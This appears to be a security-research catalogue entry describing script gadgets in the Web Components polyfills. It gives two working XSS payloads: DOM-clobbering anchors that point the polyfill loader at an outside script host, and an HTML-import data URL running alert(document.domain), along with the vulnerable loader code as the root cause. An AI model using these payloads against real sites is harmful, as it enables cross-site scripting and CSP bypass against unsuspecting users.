The Web Components polyfills are a suite of JavaScript libraries that implement Web Components APIs for browsers that don’t have built-in support.
Since the payload uses HTML Collection, it won’t works on Firefox.
<!-- user input -->
<a id="ShadyDOM"></a>
<a id="ShadyDOM" name="force"></a>
<a id="WebComponents"></a>
<a id="WebComponents" name="root" href="https://gmsgadget.com/assets/xss/"></a>
<script src="https://unpkg.com/@webcomponents/[email protected]/webcomponents-loader.js"></script>Root Cause
var polyfills = [];
if (
!(
'attachShadow' in Element.prototype && 'getRootNode' in Element.prototype
) ||
(window.ShadyDOM && window.ShadyDOM.force)
) {
polyfills.push('sd');
}
if (!window.customElements || window.customElements.forcePolyfill) {
polyfills.push('ce');
}
if (window.WebComponents.root) {
url = window.WebComponents.root + polyfillFile;
if (
window.trustedTypes &&
window.trustedTypes.isScriptURL(window.WebComponents.root)
) {
url = policy.createScriptURL(url);
}
}
Related links:
Found by jackfromeast, ishmeals.
The polyfills library was using link rel="import" to specify additional HTML to load.
<link rel="import" href="data:text/html,<script>alert(document.domain)</script>">
<script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/webcomponentsjs/1.3.3/webcomponents-lite.js"></script>Related links:
Found by @slekies, @kkotowicz, @sirdarckcat.